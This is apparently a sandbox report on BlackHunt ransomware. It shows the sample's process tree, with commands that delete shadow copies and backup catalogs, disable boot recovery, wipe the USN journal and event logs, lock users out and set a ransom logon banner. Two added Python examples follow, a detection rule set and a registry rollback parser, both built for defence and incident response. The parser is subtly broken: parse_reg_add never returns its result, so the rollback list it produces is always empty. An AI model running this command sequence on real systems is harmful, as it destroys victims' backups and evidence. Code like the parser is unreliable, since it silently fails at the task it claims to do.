C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1372
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1272
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1200
-
-
-
[2] PID 880  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe" /F
    [3] PID 2396  C:\Windows\system32\schtasks.exe
        SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe" /F
        - Creates scheduled task(s)

[2] PID 2020  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    [3] PID 816  C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
        - Enumerates connected drives
        - Interacts with shadow copies

[2] PID 480  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
    [3] PID 1588  C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
        - Enumerates connected drives
        - Interacts with shadow copies

[2] PID 528  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    [3] PID 1436  C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
        - Interacts with shadow copies

[2] PID 1080  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    [3] PID 2920  C:\Windows\system32\vssadmin.exe
        vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
        - Interacts with shadow copies

[2] PID 2980  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
    [3] PID 2612  C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /all /quiet
        - Interacts with shadow copies

[2] PID 1744  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
    [3] PID 572  C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled No
        - Modifies boot configuration data using bcdedit

[2] PID 1316  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    [3] PID 280  C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
        - Modifies boot configuration data using bcdedit

[2] PID 2240  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    [3] PID 1692  C:\Windows\system32\fsutil.exe
        fsutil.exe usn deletejournal /D C:
        - Deletes NTFS Change Journal

[2] PID 448  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    [3] PID 2772  C:\Windows\system32\wbadmin.exe
        wbadmin.exe delete catalog -quiet
        - Deletes backup catalog

[2] PID 2200  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    [3] PID 916  C:\Windows\system32\schtasks.exe
        schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

[2] PID 3424  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
    [3] PID 3800  C:\Windows\system32\fsutil.exe
        fsutil usn deletejournal /D F:\
        - Enumerates connected drives

[2] PID 5200  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
    [3] PID 3628  C:\Windows\system32\fsutil.exe
        fsutil usn deletejournal /D C:\

[2] PID 5896  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
    [3] PID 3440  C:\Windows\system32\fsutil.exe
        fsutil usn deletejournal /D M:\
        - Enumerates connected drives

[2] PID 3488  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
    [3] PID 2560  C:\Windows\system32\wevtutil.exe
        wevtutil.exe cl Setup
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken

[2] PID 3540  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
    [3] PID 4076  C:\Windows\system32\reg.exe
        REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f

[2] PID 1252  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
    [3] PID 4020  C:\Windows\system32\reg.exe
        REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

[2] PID 3596  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    [3] PID 3732  C:\Windows\system32\schtasks.exe
        schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

[2] PID 3476  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    [3] PID 3900  C:\Windows\system32\wbadmin.exe
        wbadmin.exe delete catalog -quiet
        - Deletes backup catalog

[2] PID 3428  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    [3] PID 3932  C:\Windows\system32\fsutil.exe
        fsutil.exe usn deletejournal /D C:
        - Deletes NTFS Change Journal

[2] PID 3848  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    [3] PID 3976  C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
        - Modifies boot configuration data using bcdedit

[2] PID 1720  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
    [3] PID 1728  C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled No
        - Modifies boot configuration data using bcdedit

[2] PID 3568  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
    [3] PID 4072  C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /all /quiet
        - Interacts with shadow copies

[2] PID 3576  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
    [3] PID 2016  C:\Windows\system32\wevtutil.exe
        wevtutil.exe cl Security /e:false
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken

[2] PID 3172  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
    [3] PID 2520  C:\Windows\system32\wevtutil.exe
        wevtutil.exe cl Security
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken

[2] PID 3884  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
    [3] PID 2204  C:\Windows\system32\wevtutil.exe
        wevtutil.exe cl Application
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken

[2] PID 2664  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
    [3] PID 3768  C:\Windows\system32\wevtutil.exe
        wevtutil.exe cl System
        - Clears Windows event logs
        - Suspicious use of AdjustPrivilegeToken

[2] PID 2680  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
    [3] PID 1576  C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

[2] PID 2916  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
    [3] PID 944  C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

[2] PID 2992  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
    [3] PID 2608  C:\Windows\system32\schtasks.exe
        SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

[2] PID 3772  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
    [3] PID 2120  C:\Windows\system32\taskkill.exe
        taskkill /IM mshta.exe /f
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken

[2] PID 3700  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
    [3] PID 780  C:\Windows\system32\notepad.exe
        notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

[2] PID 3324  C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
    [3] PID 2536  C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"
        - Suspicious behavior: CmdExeWriteProcessMemorySpam

[2] PID 1524  C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe"
    - Deletes itself
    [3] PID 2772  C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1 -n 5
        - Runs ping.exe

[1] PID 2160  C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "1455865159-1620223068-355507471-20865455924268963611065944535-40507628-358774383"
    - Modifies registry class

[1] PID 2140  C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken

[1] PID 2196  C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    - Suspicious use of AdjustPrivilegeToken

[1] PID 2104  C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k swprv

[1] PID 2648  C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding

[1] PID 1420  C:\Windows\System32\vds.exe
    C:\Windows\System32\vds.exe

[1] PID 332  C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

[1] PID 880  C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
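The process tree above is, read top to bottom, the standard ransomware pre-encryption sequence: Defender policy tampering, user lock-out policies, shadow copy and backup catalog deletion, boot recovery disabled, USN journal and event logs wiped. Each command on its own has a legitimate administrative use, so a useful detection keys on the command lines and then on their co-occurrence. The script below is an added example, not part of the tria.ge report: it runs a small rule set over process-creation records constructed from the command lines shown above. The record shape (pid, image, cmdline), the rule names and the escalation logic in assess() are this example's own assumptions; the ATT&CK technique IDs are the standard ones for each behaviour.

```python
"""Rule-based triage of sandbox process-creation records (added example)."""
import re
from collections import Counter

# (rule name, ATT&CK technique, regex over the raw command line). Assumption:
# the command line is the string the sandbox logged, matched case-insensitively.
RULES = [
    ("shadow_copy_deletion", "T1490", r"vssadmin(\.exe)?\s+delete\s+shadows"),
    ("shadow_storage_resize", "T1490", r"vssadmin(\.exe)?\s+resize\s+shadowstorage"),
    ("backup_catalog_deletion", "T1490", r"wbadmin(\.exe)?\s+delete\s+catalog"),
    ("boot_recovery_disabled", "T1490",
     r"bcdedit\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"),
    ("system_restore_disabled", "T1490",
     r'(SystemRestore"\s+/v\s+"Disable(SR|Config)"'
     r'|schtasks(\.exe)?\s+/change\s+/tn\s+"\\Microsoft\\Windows\\SystemRestore\\SR"\s+/disable)'),
    ("usn_journal_deletion", "T1070", r"fsutil(\.exe)?\s+usn\s+deletejournal"),
    ("event_log_cleared", "T1070.001", r"wevtutil(\.exe)?\s+cl\s+\S+"),
    ("defender_policy_tamper", "T1562.001",
     r'reg\s+add\s+"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender'),
    ("scheduled_task_as_system", "T1053.005",
     r'schtasks(\.exe)?\s+/create\s+.*?/ru\s+"nt authority\\system"'),
    ("run_key_to_hta", "T1547.001", r'CurrentVersion\\Run"\s+/v\s+.*?/d\s+"[^"]+\.hta"'),
    ("user_lockout_policy", "T1112",
     r'Policies\\(System|Explorer)"\s+/v\s+"(DisableTaskMgr|NoRun|DisableLockWorkstation|NoLogoff'
     r'|DisableChangePassword|NoClose|StartMenuLogOff)"\s+/t\s+REG_DWORD\s+/d\s+1\b'),
    ("logon_banner_ransom_note", "T1112", r'Policies\\System"\s+/v\s+"legalnotice(text|caption)"'),
]
COMPILED = [(n, t, re.compile(p, re.IGNORECASE)) for n, t, p in RULES]

# Constructed from the report's process tree: (pid, image, command line).
# The last two records are benign controls; the /d 0 record is the sample's own revert.
SAMPLE_EVENTS = [
    (2680, r"C:\Windows\system32\reg.exe", r'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f'),
    (2840, r"C:\Windows\system32\reg.exe", r'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f'),
    (1704, r"C:\Windows\system32\reg.exe", r'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f'),
    (1420, r"C:\Windows\system32\reg.exe", r'reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f'),
    (944, r"C:\Windows\system32\reg.exe", r'reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f'),
    (2396, r"C:\Windows\system32\schtasks.exe", r'SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\eddbc2aa65f607121f04f4e3a9ac757910278a24dd3e5452f2a3e1b67038da16.exe" /F'),
    (816, r"C:\Windows\system32\vssadmin.exe", r"vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB"),
    (2612, r"C:\Windows\system32\vssadmin.exe", r"vssadmin.exe Delete Shadows /all /quiet"),
    (572, r"C:\Windows\system32\bcdedit.exe", r"bcdedit /set {default} recoveryenabled No"),
    (280, r"C:\Windows\system32\bcdedit.exe", r"bcdedit /set {default} bootstatuspolicy IgnoreAllFailures"),
    (1692, r"C:\Windows\system32\fsutil.exe", r"fsutil.exe usn deletejournal /D C:"),
    (2772, r"C:\Windows\system32\wbadmin.exe", r"wbadmin.exe delete catalog -quiet"),
    (916, r"C:\Windows\system32\schtasks.exe", r'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable'),
    (2276, r"C:\Windows\system32\reg.exe", r'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f'),
    (2016, r"C:\Windows\system32\wevtutil.exe", r"wevtutil.exe cl Security /e:false"),
    (4076, r"C:\Windows\system32\reg.exe", r'REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f'),
    (780, r"C:\Windows\system32\notepad.exe", r"notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt"),
]


def match_rules(cmdline):
    """Return the (rule, technique) pairs whose pattern matches one command line."""
    return [(name, tid) for name, tid, rx in COMPILED if rx.search(cmdline)]


def triage(events):
    """Run every rule over every (pid, image, cmdline) record; one finding per hit."""
    findings = []
    for pid, image, cmdline in events:
        for name, tid in match_rules(cmdline):
            findings.append({"pid": pid, "image": image, "rule": name, "technique": tid})
    return findings


def summarize(findings):
    """Hits per rule, the view an analyst skims first."""
    return Counter(f["rule"] for f in findings)


def assess(findings):
    """Escalate when recovery inhibition (T1490) co-occurs with event log clearing.
    Each command alone has admin use; together they are the pattern this report shows."""
    techniques = Counter(f["technique"] for f in findings)
    if techniques["T1490"] >= 2 and techniques["T1070.001"] >= 1:
        return "high: recovery inhibition combined with event log clearing"
    if findings:
        return "medium: %d suspicious command(s)" % len(findings)
    return "none"


if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for f in hits:
        print("PID %-5d %-26s %-10s %s" % (f["pid"], f["rule"], f["technique"], f["image"]))
    print(summarize(hits))
    print(assess(hits))
```

The rules deliberately require the exact policy path and /d 1 for the lock-out values, so the sample's own final reverts (NoRun and DisableTaskMgr set back to 0) and the notepad launch produce no hits; on a real host the same rules should be fed the parent image as well, since every tool here is spawned through cmd.exe /c, which is itself worth a rule.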
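Most of the damage that survives the sample's own cleanup is the set of reg add writes above (Defender policies, the HKCU lock-out values, System Restore, WinRE and backup UI policies, the logon banner, the Run key and the Hunt2 file class). The parser below is an added example, not part of the report or the BlackHunt code: it tokenises reg add command lines the way reg.exe quotes them, extracts key, value name, type and data, and turns the unique entries into a reg delete review list. SAMPLE_REG_ADDS is constructed from lines in the process tree; the switches handled (/v, /ve, /t, /d, /f) are the ones those lines use.

```python
"""Parse reg add command lines and derive a rollback review list (added example)."""
import re

_TOKEN = re.compile(r'"[^"]*"|\S+')  # reg.exe arguments: quoted string or bare word


def _unquote(tok):
    return tok[1:-1] if len(tok) >= 2 and tok[0] == tok[-1] == '"' else tok


def parse_reg_add(cmdline):
    """Return {key, value, default, type, data, force} for a reg add line, else None.
    Only the switches the report's lines use (/v, /ve, /t, /d, /f) are understood."""
    toks = _TOKEN.findall(cmdline.strip())
    if len(toks) < 3 or toks[0].lower() not in ("reg", "reg.exe") or toks[1].lower() != "add":
        return None
    entry = {"key": _unquote(toks[2]), "value": None, "default": False,
             "type": None, "data": None, "force": False}
    i = 3
    while i < len(toks):
        sw = toks[i].lower()
        has_arg = i + 1 < len(toks)
        if sw == "/v" and has_arg:
            entry["value"] = _unquote(toks[i + 1]); i += 2
        elif sw == "/t" and has_arg:
            entry["type"] = toks[i + 1].upper(); i += 2
        elif sw == "/d" and has_arg:
            entry["data"] = _unquote(toks[i + 1]); i += 2
        elif sw == "/ve":
            entry["default"] = True; i += 1      # writes the key's (Default) value
        elif sw == "/f":
            entry["force"] = True; i += 1
        else:
            i += 1                               # unknown switch (e.g. /reg:64): skip it


def rollback_command(entry):
    """reg delete for the value the sample set. Returns None when the line only
    created a key (no /v and no /ve): deleting a whole key needs a human decision."""
    if entry["default"]:
        target = "/ve"
    elif entry["value"] is not None:
        target = '/v "%s"' % entry["value"]
    else:
        return None
    return 'reg delete "%s" %s /f' % (entry["key"], target)


def rollback_plan(cmdlines):
    """Unique rollback commands in first-seen order. Repeated writes to one value
    (DisableLockWorkstation twice; DisableTaskMgr set to 1 then 0) collapse to one."""
    seen, plan = set(), []
    for line in cmdlines:
        entry = parse_reg_add(line)
        if entry is None:
            continue
        ident = (entry["key"].lower(), "" if entry["default"] else (entry["value"] or "").lower())
        cmd = rollback_command(entry)
        if cmd and ident not in seen:
            seen.add(ident)
            plan.append(cmd)
    return plan


SAMPLE_REG_ADDS = [  # constructed from the report's process tree
    r'reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f',
    r'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f',
    r'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f',
    r'reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f',
    r'reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f',
    r'reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f',
    r'reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f',
    r'REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f',
    r"vssadmin.exe Delete Shadows /all /quiet",  # not a reg add: ignored
]

if __name__ == "__main__":
    for cmd in rollback_plan(SAMPLE_REG_ADDS):
        print(cmd)
```

Two caveats for using the output: reg delete restores the default only where the value did not exist before the infection, so any value that an enterprise baseline also sets (the Defender policy keys in particular) should be restored from that baseline rather than deleted; and the HKEY_CURRENT_USER entries live in the hive of the user the sample ran as, so the deletes must run in that user's context or against the loaded NTUSER.DAT, not from an administrator's own session.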
Network
MITRE ATT&CK Enterprise v15 (numbers are the report's per-technique counts)
Persistence
  Boot or Logon Autostart Execution (T1547): 1
    Registry Run Keys / Startup Folder (T1547.001): 1
  Create or Modify System Process (T1543): 1
    Windows Service (T1543.003): 1
  Scheduled Task/Job (T1053): 1
Privilege Escalation
  Abuse Elevation Control Mechanism (T1548): 1
    Bypass User Account Control (T1548.002): 1
  Boot or Logon Autostart Execution (T1547): 1
    Registry Run Keys / Startup Folder (T1547.001): 1
  Create or Modify System Process (T1543): 1
    Windows Service (T1543.003): 1
  Scheduled Task/Job (T1053): 1
Defense Evasion
  Abuse Elevation Control Mechanism (T1548): 1
    Bypass User Account Control (T1548.002): 1
  Impair Defenses (T1562): 2
    Disable or Modify Tools (T1562.001): 2
  Indicator Removal (T1070): 4
    File Deletion (T1070.004): 3
  Modify Registry (T1112): 5
Downloads
Download 1
  Filesize: 1KB
  MD5:    8640a2dcf8d9d0893c91aeca951af454
  SHA1:   5a0ecf701e23fef82d3ac9cef659877aee78486f
  SHA256: c681b71caabdbc60f3bbc315e017e67c14ff891255759e090c6748a898760d08
  SHA512: 5e36ae70f28c08ce82b7f8214f6f194d2ac4074a97419559679d56b714c5501d0a2363e9e007e3321958940753f518b6998174de2033416a1065d0ca5ec7eb14
Download 2
  Filesize: 12KB
  MD5:    30a1b458b0e080c21f9d23bdd00a1e09
  SHA1:   c9f34bed06133acca2451b35f660a19f069bfbe2
  SHA256: d122b9627c20300e6325d8bd72e9e1c0ddbda0873bf5ae4a654390f7da34bdd0
  SHA512: 73c385aa6fe8ed36a236588520efa1fd52351cb502e0283858987d30c9097be566283cd60c578014cf957a8038fe8028002986265f22ceb29eccc27125c7a372
Download 3
  Filesize: 684B
  MD5:    4d303ca2902394c23d247ac68cc6e856
  SHA1:   3b66066ce8c892f960e9595fcddfdda1a8e5f3f5
  SHA256: d15dc111d4fcc6f3bb81285609d29bedb921fc1321d6fd4334675e6dc167219c
  SHA512: 89e658f6e7e18baa45cfb37bc0d9ae056e4c66e6d55c42908d159afcfebafda9944d59ed26efe8f18d6e34d32653dbaa6f1b3ad317426c106616b39126f3717d